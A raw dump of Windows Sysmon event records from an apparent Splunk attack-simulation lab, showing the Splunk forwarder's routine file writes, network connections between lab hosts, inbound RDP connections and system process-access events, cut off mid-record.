Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC7B424E1A95CE89F69C6C45A1FD7449,SHA256=A988DBEB264FDA603F3899416CB183F23324C5E26A2B74F719AE6941FC600FE3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811163Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:37.998{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-14572-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000811162Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:39.469{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=592BDB6504AB59F85AF43B6AEFC44669,SHA256=48DA9F4AD29256D303E18565F852A52CE03717000877DE033D751E1EADF6FC8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811161Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:39.469{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCB64855C5541B7A388AF889B5EA5B53,SHA256=22BC3FFADB4D90599B067AC95256A6CDB4D9B7B2D40DDD3E16A2B32A3C97A65D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811160Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:39.235{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BC9BD558B62AB112F330EBB59500B0F,SHA256=3C57CF52BA98F25CD198A8391375DFB45EBF09D1CC00CF0CA4FE9D33EDCA27FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:39.232{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12DDF3C80987CCD08DCAE96EA29A3E68,SHA256=8B34762E235FE38113B20A2B0441F10BAB91092047EAA800522C0FCD64017714,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811166Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:39.306{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57520-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000811165Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:38.620{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57519-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000811164Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:40.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE831957C9AF7A857C2A7BB6FE3D214D,SHA256=9C8C6ACEFCB792307CB1FF25005CC040FC825A1DD8F8BCEEEF5A0CDFD6C56261,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:40.478{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CF21187B9F3DB473F0253037E3A40ED,SHA256=7FD05ACDF17CB2684A0772F3898058B1E01BBC9C918F60F4F2271F9F2B020819,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:40.478{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9D10EC6174D8337DF09A25FDFB984CFD,SHA256=F14A8FE997296669D715FDF9A0EB912B959AB885497257BC646E97C5D89ED535,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:40.247{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3633026FC0B234F0FBF4491CEC3759B9,SHA256=01C26673309E83FDDB22BCE3E8D7EAD399DC6439DF8749EDBD670D88811089ED,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:32.454{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse84.242.35.58static-host-84-242-35-58.awasr.om55728-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001055827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:31.991{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57519-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001055834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:41.262{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C9A8B0EEA7940B72C7CAE7FB6A7C89D,SHA256=1F59B7C422AC590899C021724AE7148DA94A980B4049D7CA432696D0BA95B98F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:32.669{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62024-false10.0.1.12-8000- 23542300x8000000000000000811167Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:41.282{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=246D121D69DA1BEA9BE2B6AE8F2307A7,SHA256=89828905924C20D6EBB3C8343103F06D65EDA5729F958BB18F4344BD0EA97473,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:41.193{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000811168Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:42.298{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24A0ACA182E624BC02A7B1C8392681F3,SHA256=E4B5E569E5AB06F39232DE757EB87B7410650E30D26695B4FB819AF3DAEEE91C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:42.292{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80388952817498CBE1578BA25796A420,SHA256=2AF2901D5E0BF215E9C419B3B746270CCEAF396234ABC7398B51AD9E9B7C7464,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811169Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:43.329{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79C9D59E8DD103098FA076D3D2DA0B2B,SHA256=C2FE3F89B1A44A741C7562B56A7E814710CAA9EC4FC9A18097529749ECE4FEAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:43.313{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8A05E23136F18513993097699B02270,SHA256=D83F3A93ED42AD51C739A72388547512D8D60F2D0B75E4C01BA714278DEC032F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811170Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:44.391{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7658852C12F29FCA47AF6E26ACD58356,SHA256=19A5B5371E133011ACABC1E466ABC63C4814DCBB196A0910A23CC60F0C85C62F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:44.328{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D98297B8113448E5AFAFAC1C197E13C,SHA256=DE9FF07D8BB24289FDD4C8B6BB10DC7AC696AD01E5BEF12F5FCCCC6EC0EEADD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811171Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:45.454{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC99B971CEDF3B661AEF5D06F4AF8ECE,SHA256=352232D9D014D2EBE44290B03B77933C1E35AD15264B9967200D68E33969A334,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:45.359{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CA73C9E15C83F6886CC3BADE98BDEFB,SHA256=62C6E88F94F023F5EEB96053DB67B061F8D0E0052A338065E1177905AA43560D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:46.389{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEE0BDC584EEA05DF9BC5337B1B9C3E2,SHA256=82BA8A97C380628B7D5DD73A9E88C05DEC00C15B53065E6D94DB161DB84216C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811172Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:46.501{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CACC5B9DB7EBC6F675892E5242EE32E,SHA256=9525640A8B77542B900FAC923AA46827062CAD1BBCF422E2618EA9BEC17C0DD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:47.457{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26E99702A124B9FC7EA2A373CCAA52BA,SHA256=B7B0A6EDA8FB74A4F408CD5E5E5BAA792D33EBD50EF7493FD4018C6CA2CF0722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811174Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:47.501{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB885125FCE9FC884B5A64EA5800F124,SHA256=BFFFE760B442D79A0972E3A5666DB041582C3C398F4841A39B1177559C13554B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:38.712{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62025-false10.0.1.12-8000- 354300x8000000000000000811173Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:45.306{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57521-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000811175Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:48.532{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3501E773B4F8570BFADB92100D7030E,SHA256=2E3D751783315C2AACEABFB7EA4826E4C445F9DE3CDCE4F5F7E34381351E18B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:48.488{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D26F8080D556AFC99608594A15403E71,SHA256=12AB7E11AE8EACA404D775E79748779CD1B0466C684E6C40B7E0DEA575A2D6D2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:48.025{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000811176Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:49.548{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23482D720A1E280836A29595AB8A073F,SHA256=B3811715641579D8EB04C193BAD2E0DD396DBB7635EBAC3FDC96429BBE09F1D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:49.525{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FC5E16A9150BA81EE0E6223BC20FAA6,SHA256=395F6C7F810C17BD8A9C6605294BFA591911DB64F9B95F817546151084CBC25F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.955{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F946-60EB-1A7E-00000000CF01}9568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.955{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.955{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.955{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.955{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F946-60EB-1A7E-00000000CF01}9568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.955{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.955{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F946-60EB-1A7E-00000000CF01}9568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.940{466BC892-F946-60EB-1A7E-00000000CF01}9568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.555{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE07EC03CA5222534246BFA9F425C323,SHA256=EA89CE4682A54E2BE0CBFA3F0DEA4FBF5F7859199112164A9F72CD8D90522604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811177Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:50.548{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 